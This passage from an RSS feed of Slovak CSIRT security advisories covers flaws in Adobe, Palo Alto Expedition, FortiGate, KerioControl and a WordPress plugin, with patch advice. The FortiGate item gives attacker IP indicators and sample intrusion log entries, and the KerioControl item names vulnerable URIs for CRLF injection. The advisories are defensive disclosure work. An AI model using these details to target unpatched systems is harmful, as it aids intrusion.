<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Avalanche-6-4-7-Multiple-CVEs">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Avalanche-6-4-7-Multiple-CVEs</a></li>



<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Application-Control-Engine-CVE-2024-10630?language=en_US">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Application-Control-Engine-CVE-2024-10630</a></li>



<li><a href="https://thehackernews.com/2025/01/researcher-uncovers-critical-flaws-in.html">https://thehackernews.com/2025/01/researcher-uncovers-critical-flaws-in.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1921/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické bezpečnostné zraniteľnosti v produktoch Adobe</title>
		<link>/posts/1919</link>
					<comments>/posts/1919#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 17 Jan 2025 13:03:17 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1919</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty Adobe Photoshop, Adobe Substance3D Stager, Adobe Illustrator for iPad, Adobe Animate, Adobe...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>
<p><strong>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty Adobe Photoshop, Adobe Substance3D Stager, Adobe Illustrator for iPad, Adobe Animate, Adobe Substance3D Designer, ktoré opravujú 14 kritických zraniteľností. Uvedené zraniteľnosti by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvorených súborov mohol zneužiť na vykonanie škodlivého kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Adobe Photoshop 2025 v 26.1 a staršie</li>



<li>Adobe Photoshop 2024 v 25.12 a staršie</li>



<li>Adobe Substance 3D Stager v &nbsp;3.0.4 a staršie</li>



<li>Adobe Illustrator on iPad v 3.0.7 a staršie</li>



<li>Adobe Animate  2023 v 23.0.9 a staršie</li>



<li>Adobe Animate  2024 v 24.0.6 a staršie</li>



<li>Adobe Substance 3D Designer v 14.0 a staršie</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Adobe Photoshop:</u></strong></p>



<p><strong>CVE-2025-21127 </strong>(CVSS skóre 7,3), <strong>CVE-2025-21122 </strong>(CVSS skóre 7,8)</p>



<p>Kritické zraniteľnosti v&nbsp;produkte Adobe Photoshop spočívajú v&nbsp;podtečení celočíselnej premennej (CVE-2025-21122) a&nbsp;absencii overovania vyhľadávacích ciest (CVE-2025-21127) a&nbsp;podvrhnutím špeciálne vytvorených súborov ich možno zneužiť na <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong><u>Adobe Substance 3D Stager:</u></strong></p>



<p><strong>CVE-2025-21128, CVE-2025-21129, CVE-2025-21130, CVE-2025-21131, CVE-2025-21132 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajúce v&nbsp;možnosti&nbsp;zápisu do pamäte mimo povolených hodnôt (CVE-2025-21130, CVE-2025-21131, CVE-2025-21132), pretečení medzipamäte haldy (CVE-2025-21129) a&nbsp;pretečení vyrovnávacej pamäte zásobníka (CVE-2025-21128) umožňujú <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong><u>Adobe Illustrator on iPad:</u></strong></p>



<p><strong>CVE-2025-21133, CVE-2025-21134 </strong>(CVSS skóre 7,8)</p>



<p>Obe zraniteľnosti spočívajú v&nbsp;podtečení celočíselnej premennej v&nbsp;rámci produktu Adobe Illustrator on iPad možno zneužiť na <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong><u>Adobe Animate:</u></strong></p>



<p><strong>CVE-2025-21135 </strong>(CVSS skóre 7,8)</p>



<p>Podtečenie celočíselnej premennej možno zneužiť na <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong><u>Adobe Substance 3D Designer:</u></strong></p>



<p><strong>CVE-2025-21136, CVE-2025-21137, CVE-2025-21138, CVE-2025-21139 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajúce v&nbsp;povolení&nbsp;zápisu do pamäte mimo povolených hodnôt (CVE-2025-21136, CVE-2025-21138) a pretečení medzipamäte haldy (CVE-2025-21137, CVE-2025-21139) umožňujú <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong>Zneužitie vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí stiahnuť a&nbsp;otvoriť špeciálne vytvorené súbory.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov aspoň na verzie:</p>



<ul>
<li>Adobe Photoshop 2025 v 26.2</li>



<li>Adobe Photoshop 2024 v 25.12.1</li>



<li>Adobe Substance 3D Stager v 3.1.0</li>



<li>Adobe Illustrator on iPad v 3.0.8</li>



<li>Adobe Animate  2023 v 23.0.10</li>



<li>Adobe Animate  2024 v 24.0.7</li>



<li>Adobe Substance 3D Designer v 14.1</li>
</ul>



<p>Zároveň odporúčame poučiť používateľov, aby neotvárali správy a&nbsp;prílohy z&nbsp;neznámych a&nbsp;nedôveryhodných zdrojov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://helpx.adobe.com/security/products/photoshop/apsb25-02.html">https://helpx.adobe.com/security/products/photoshop/apsb25-02.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d_stager/apsb25-03.html">https://helpx.adobe.com/security/products/substance3d_stager/apsb25-03.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/illustrator-mobile-ios/apsb25-04.html">https://helpx.adobe.com/security/products/illustrator-mobile-ios/apsb25-04.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/animate/apsb25-05.html">https://helpx.adobe.com/security/products/animate/apsb25-05.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d_designer/apsb25-06.html">https://helpx.adobe.com/security/products/substance3d_designer/apsb25-06.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1919/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bezpečnostné zraniteľnosti v migračnom nástroji Palo Alto Networks Expedition</title>
		<link>/posts/1917</link>
					<comments>/posts/1917#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 17 Jan 2025 12:46:14 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Palo Alto]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1917</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/palo-alto-networks-inc-logo-vector.png" alt="" /></p>Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú 5 zraniteľností v&#160;migračnom nástroji Expedition. Najzávažnejšiu zraniteľnosť CVE-2025-0103 možno zneužiť na...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/palo-alto-networks-inc-logo-vector.png" alt="" /></p>
<p><strong>Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú 5 zraniteľností v&nbsp;migračnom nástroji Expedition. Najzávažnejšiu zraniteľnosť CVE-2025-0103 možno zneužiť na získanie neoprávneného prístupu k&nbsp;citlivým údajom a&nbsp;vytvorenie alebo odstránenie súborov na systémoch spravovaných prostredníctvom Expedition.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Palo Alto Expedition vo verziách starších ako 1.2.101</li>
</ul>



<p><em>Pozn.: Spoločnosť Palo Alto k&nbsp;31. decembru 2024 ukončila poskytovanie technickej podpory pre produkt Expedition. Bližšie informácie môžete nájsť na <a href="https://live.paloaltonetworks.com/t5/expedition-articles/important-update-end-of-life-announcement-for-palo-alto-networks/ta-p/589642">stránke výrobcu</a></em><em>.</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-0103 </strong>(CVSS 4.0 skóre 7,8)</p>



<p>Vysoko závažnú zraniteľnosť CVE-2025-0103 by vzdialený autentifikovaný útočník prostredníctvom <strong>SQL injekcie</strong> mohol zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong> v&nbsp;databáze a&nbsp;<strong>vytvorenie nových alebo čítanie obsahu existujúcich súborov</strong> na systémoch Expedition.</p>



<p><strong>CVE-2025-0104 </strong>(CVSS 4.0 skóre 4,7)</p>



<p>Zraniteľnosť by vzdialený neautentifikovaný útočník prostredníctvom reflektovaných XSS (Cross Site Scripting) útokov mohol zneužiť na <strong>vykonanie JavaScript kódu</strong> vo webovom prehliadači obeti a&nbsp;<strong>krádež relácie obete</strong>. <strong>Zneužitie zraniteľnosti vyžaduje interakciu používateľa </strong>so škodlivým odkazom<strong>.</strong></p>



<p><strong>CVE-2025-0107 </strong>(CVSS 4.0 skóre 4,4)</p>



<p>Bližšie nešpecifikovanú zraniteľnosť možno zneužiť na <strong>injekciu systémových príkazov</strong> s&nbsp;oprávneniami používateľa <em>www-data</em> a&nbsp;získanie <strong>neoprávneného prístupu k&nbsp;citlivým údajom</strong>.</p>



<p><strong>CVE-2025-0105, CVE-2025-0106 </strong>(CVSS 4.0 skóre 2,7)</p>



<p>Zraniteľnosti možno zneužiť na <strong>enumeráciu súborov</strong> na súborovom systéme a&nbsp;<strong>zmazanie súborov</strong> prístupných používateľovi <em>www-data</em>.</p>



<p><strong>Databáza a&nbsp;súbory v&nbsp;rámci Expedition môžu obsahovať prihlasovacie údaje, konfiguračné nastavenia a&nbsp;API kľúče pre firewally s&nbsp;operačným systémom PAN-OS, ktoré možno v&nbsp;rámci ďalších útokov zneužiť na prienik do systémov.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Palo Alto odporúča <strong>bezodkladnú aktualizáciu</strong> nástroja Expedition na verziu 1.2.101. Vzhľadom na to, že k&nbsp;31. decembru 2024 bola <a href="https://live.paloaltonetworks.com/t5/expedition-articles/important-update-end-of-life-announcement-for-palo-alto-networks/ta-p/589642"><strong>ukončená technická podpora</strong></a><strong> tohto produktu</strong>, výrobca odporúča <strong>prejsť na alternatívne produkty s platnou technickou podporou</strong>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://security.paloaltonetworks.com/PAN-SA-2025-0001">https://security.paloaltonetworks.com/PAN-SA-2025-0001</a></li>



<li><a href="https://thehackernews.com/2025/01/major-vulnerabilities-patched-in.html">https://thehackernews.com/2025/01/major-vulnerabilities-patched-in.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1917/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zraniteľnosť vo firewalloch FortiGate od spoločnosti Fortinet</title>
		<link>/posts/1915</link>
					<comments>/posts/1915#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 17 Jan 2025 12:27:28 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Fortinet]]></category>
		<guid isPermaLink="false">/?p=1915</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zero-day zraniteľnosť v operačnom systéme FortiOS a produkte FortiProxy. CVE-2024-55591 možno...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zero-day zraniteľnosť v operačnom systéme FortiOS a produkte FortiProxy. CVE-2024-55591 možno zaslaním špeciálne vytvorenej požiadavky zneužiť na získanie administrátorského prístupu k zariadeniu a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>[Aktualizácia: 13.2.2025]</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>FortiOS 7.0.X vo verziách starších ako 7.0.17</li>



<li>FortiProxy 7.2.X vo verziách starších ako 7.2.13</li>



<li>FortiProxy 7.0.X vo verziách starších ako 7.0.20</li>
</ul>



<p><em>Pozn.: Zraniteľné sú všetky neaktualizované zariadenia s manažmentovým rozhraním dostupným z internetu.</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-55591 </strong>(CVSS skóre 9,6)</p>



<p>Kritická zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorenej požiadavky na websocket modul Node.js mohol zneužiť na <strong>získanie administrátorského prístupu (privilégiá super-admin) k&nbsp;zariadeniu</strong>.</p>



<p><strong>Zraniteľnosť je aktívne zneužívaná minimálne od polovice novembra 2024. </strong>Útočníci po získaní kontroly nad zariadením vytvárajú nové používateľské účty (vrátane administrátorských), pridávajú ich do existujúcich alebo novovytvorených SSL VPN skupín, modifikujú firewallové pravidlá a&nbsp;vykonané úpravy zneužívajú na prienik do chránených VPN sietí.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Výrobca odporúča vykonať <strong>bezodkladnú aktualizáciu FortiOS 7.0.X na verziu 7.0.17, FortiProxy 7.2.X na verziu 7.2.13 a FortiProxy 7.0.X na verziu 7.0.20</strong> a <strong>limitovať prístup k manažmentovému rozhraniu firewallov</strong>. Prístup možno limitovať úplnou deaktiváciou manažmentového rozhrania alebo konfiguráciou zoznamu dôveryhodných IP adries v&nbsp;rámci zariadení. Kompletný návod môžete nájsť na <a href="https://www.fortiguard.com/psirt/FG-IR-24-535">stránke výrobcu</a> v&nbsp;časti Workaround. Spoločnosť Fortinet taktiež odporúča <strong>vykonať </strong><a href="https://fortinetweb.s3.amazonaws.com/docs.fortinet.com/v2/attachments/81327170-6878-11ea-9384-00505692583a/FortiOS-6.4.0-Hardening_your_FortiGate.pdf"><strong>hardening zariadení s&nbsp;FortiOS</strong></a>.</p>



<p><strong>Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame dôkladne preveriť prítomnosť dostupných indikátorov kompromitácie v logoch FortiGate zariadení a logoch ďalších sieťových a bezpečnostných prvkov.</strong></p>



<p><em>[Aktualizácia: 13.2.2025]</em></p>



<p><strong><em>CVE-2025-24472</em> </strong><em>(CVSS skóre 8,1)</em></p>



<p><em>Spolu s vyššie uvedenom zraniteľnosťou spoločnosť Fortinet opravila vysoko závažnú zraniteľnosť <em>CVE-2025-24472</em></em>. <em>Zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených CFS proxy požiadaviek mohol zneužiť na získanie úplnej kontroly nad systémom.</em></p>



<p><strong>Indikátory kompromitácie (IoC):</strong></p>



<p><span style="text-decoration: underline;">IP adresy:</span></p>



<ul>
<li>45.55.158[.]47</li>



<li>87.249.138[.]47</li>



<li>155.133.4[.]175</li>



<li>37.19.196[.]65</li>



<li>149.22.94[.]37</li>
</ul>



<p><u>Aktivity útočníka generujú záznamy v&nbsp;logoch zariadení:</u></p>



<ul>
<li>prihlásenie používateľa super_admin s&nbsp;náhodnými scrip a&nbsp;dstip (napr. 1.1.1.1, 127.0.0.1, 2.2.2.2, 8.8.8.8, 8.8.4.4), príklad logového záznamu:</li>
</ul>



<p><code>type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" sn="1733486785" user="admin" ui="jsconsole" method="jsconsole" srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" reason="none" profile="super_admin" msg="Administrator admin logged in successfully from jsconsole"</code></p>



<ul>
<li>vytvorenie administrátorského účtu s&nbsp;náhodne generovaným meno používateľa (napr. Gujhmk, Ed8x4k, G0xgey) a&nbsp;zdrojovou IP, príklad logového záznamu:</li>
</ul>



<p><code>type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" cfgtid=1411317760 cfgpath="system.admin" cfgobj="vOcep" cfgattr="password[*]accprofile[super_admin]vdom[root]" msg="Add system.admin vOcep"</code></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.fortiguard.com/psirt/FG-IR-24-535">https://www.fortiguard.com/psirt/FG-IR-24-535</a></li>



<li><a href="https://thehackernews.com/2025/01/zero-day-vulnerability-suspected-in.html">https://thehackernews.com/2025/01/zero-day-vulnerability-suspected-in.html</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/fortinet-warns-of-auth-bypass-zero-day-exploited-to-hijack-firewalls/">https://www.bleepingcomputer.com/news/security/fortinet-warns-of-auth-bypass-zero-day-exploited-to-hijack-firewalls/</a></li>



<li><a href="https://arcticwolf.com/resources/blog/console-chaos-targets-fortinet-fortigate-firewalls/">https://arcticwolf.com/resources/blog/console-chaos-targets-fortinet-fortigate-firewalls/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1915/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností december 2024</title>
		<link>/posts/1899</link>
					<comments>/posts/1899#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 15 Jan 2025 14:58:04 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1899</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci november 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných   udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci november 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/01/2024_12_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 12/2024 PDF (630 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1899/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zraniteľnosť v produkte GFI KerioControl</title>
		<link>/posts/1896</link>
					<comments>/posts/1896#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 13 Jan 2025 15:04:52 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[GFI]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[KerioControl]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1896</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/01/KerioControl.png" alt="" /></p>Spoločnosť GFI vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť v&#160;produkte KerioControl. CVE-2024-52875 možno zneužiť na vzdialené vykonanie kódu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/01/KerioControl.png" alt="" /></p>
<p><strong>Spoločnosť GFI vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť v&nbsp;produkte KerioControl. CVE-2024-52875 možno zneužiť na vzdialené vykonanie kódu a následné získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>GFI Software KerioControl vo verziách 9.2.5 až 9.4.5</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-52875 </strong>(CVSS skóre 9,6)</p>



<p>Zraniteľnosť vo webovom rozhraní KerioControl spočíva v&nbsp;nedostatočnom overovaní používateľských vstupov v&nbsp;rámci parametra <em>dest</em> požiadavky GET vo viacerých URI (Uniform Resource Identifier). Chyba bola identifikovaná v&nbsp;nasledovných URI, no môže sa nachádzať aj v&nbsp;iných:</p>



<ul>
<li><strong>/nonauth/addCertException.cs</strong></li>



<li><strong>/nonauth/guestConfirm.cs</strong></li>



<li><strong>/nonauth/expiration.cs</strong></li>
</ul>



<p>Nesprávna sanitizácia znakov LF (line feed (\n)) vzdialenému útočníkovi umožňuje realizovať tzv. <strong>HTTP Response Splitting útoky</strong>, ktoré možno zneužiť na <strong>presmerovanie obete</strong> alebo <strong>realizáciu reflektovaných XSS</strong> (Cross Site Scripting) <strong>útokov</strong>.</p>



<p><strong>Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí kliknúť na špeciálne vytvorenú URL adresu.</strong></p>



<p>V&nbsp;prípade, že obeťou sa stane používateľ s&nbsp;administrátorskými oprávneniami, možno internú funkcionalitu pre aktualizáciu firmvéru firewallu zneužiť na nahratie škodlivých IMG súborov a&nbsp;získanie úplnej kontroly nad zariadením.</p>



<p>Na uvedenú zraniteľnosť je v&nbsp;súčasnosti <strong>dostupný proof-of-concept kód</strong> demonštrujúci postup jej zneužitia. <strong>Zraniteľnosť je podľa spoločnosti </strong><a href="https://viz.greynoise.io/tags/kerio-control-cve-2024-52875-crlf-injection-attempt?days=10"><strong>GreyNoise</strong></a><strong> aktívne zneužívaná útočníkmi minimálne od 28. decembra 2024.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Výrobca odporúča bezodkladnú aktualizáciu zasiahnutých systémov na verziu 9.4.5p1. Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame v logoch sieťových a bezpečnostných prvkov preveriť HTTP požiadavky na prítomnosť znakov „\r” a “\n”, minimálne smerované na zraniteľné URI:</p>



<ul>
<li>/nonauth/addCertException.cs</li>



<li>/nonauth/guestConfirm.cs</li>



<li>/nonauth/expiration.cs</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://gfi.ai/products-and-solutions/network-security-solutions/keriocontrol/resources/documentation/product-releases">https://gfi.ai/products-and-solutions/network-security-solutions/keriocontrol/resources/documentation/product-releases</a></li>



<li><a href="https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875">https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875</a></li>



<li><a href="https://viz.greynoise.io/tags/kerio-control-cve-2024-52875-crlf-injection-attempt?days=10">https://viz.greynoise.io/tags/kerio-control-cve-2024-52875-crlf-injection-attempt?days=10</a></li>



<li><a href="https://censys.com/cve-2024-52875/">https://censys.com/cve-2024-52875/</a></li>



<li><a href="https://thehackernews.com/2025/01/critical-rce-flaw-in-gfi-keriocontrol.html">https://thehackernews.com/2025/01/critical-rce-flaw-in-gfi-keriocontrol.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1896/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti vo WordPress plugine Fancy Product Designer</title>
		<link>/posts/1894</link>
					<comments>/posts/1894#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 13 Jan 2025 15:01:12 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=1894</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>Bezpečnostní výskumníci zverejnili informácie o dvoch kritických zraniteľnostiach vo WordPress plugine Fancy Product Designer. Zraniteľnosti možno zneužiť na upload škodlivých...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zverejnili informácie o dvoch kritických zraniteľnostiach vo WordPress plugine Fancy Product Designer. Zraniteľnosti možno zneužiť na upload škodlivých súborov, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress plugin Fancy Product Designer 6.4.3 a staršie</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-51818&nbsp; </strong>(CVSS skóre 9,3)</p>



<p>Kritická zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov a možno ju prostredníctvom <strong>SQL injekcie</strong> zneužiť na získanie neoprávneného prístupu k citlivým údajom a vykonanie neoprávnených zmien v databáze.</p>



<p><strong>CVE-2024-51919 </strong>(CVSS skóre 9,0)</p>



<p>Kritická zraniteľnosť vo funkcionalite pre nahrávanie súborov spočíva v nedostatočnom overovaní a limitácii typov nahrávaných súborov pri volaní funkcií <em>save_remote_file</em> a <em>fpd_admin_copy_file</em>. Možno ju zneužiť na <strong>nahratie škodlivých súborov z&nbsp;externých URL zdrojov </strong>a<strong> vzdialené vykonanie kódu</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v&nbsp;databáze</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Fancy Product Designer na verziu 6.4.4.</p>



<p>Taktiež odporúčame preveriť logy na prítomnosť pokusov o&nbsp;zneužitie zraniteľnosti a&nbsp;integritu databázy a&nbsp;samotného redakčného systému WordPress.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://patchstack.com/articles/critical-vulnerabilities-found-in-fancy-product-designer-plugin/">https://patchstack.com/articles/critical-vulnerabilities-found-in-fancy-product-designer-plugin/</a></li>



<li><a href="https://patchstack.com/database/wordpress/plugin/fancy-product-designer/vulnerability/wordpress-fancy-product-designer-plugin-6-4-3-unauthenticated-sql-injection-vulnerability">https://patchstack.com/database/wordpress/plugin/fancy-product-designer/vulnerability/wordpress-fancy-product-designer-plugin-6-4-3-unauthenticated-sql-injection-vulnerability</a></li>



<li><a href="https://patchstack.com/database/wordpress/plugin/fancy-product-designer/vulnerability/wordpress-fancy-product-designer-plugin-6-4-3-unauthenticated-arbitrary-file-upload-vulnerability">https://patchstack.com/database/wordpress/plugin/fancy-product-designer/vulnerability/wordpress-fancy-product-designer-plugin-6-4-3-unauthenticated-arbitrary-file-upload-vulnerability</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/unpatched-critical-flaws-impact-fancy-product-designer-wordpress-plugin/">https://www.bleepingcomputer.com/news/security/unpatched-critical-flaws-impact-fancy-product-designer-wordpress-plugin/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1894/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažné zraniteľnosti vo firewalloch SonicWall s operačným systémom SonicOS</title>
		<link>/posts/1892</link>
					<comments>/posts/1892#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 09 Jan 2025 16:07:38 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[SonicWall]]></category>
		<guid isPermaLink="false">/?p=1892</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>Spoločnosť SonicWall vydala bezpečnostné aktualizácie pre svoje firewally s&#160;operačným systémom SonicOS, ktoré opravujú 4 vysoko závažné zraniteľnosti. Najzávažnejšiu zraniteľnosť s...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>
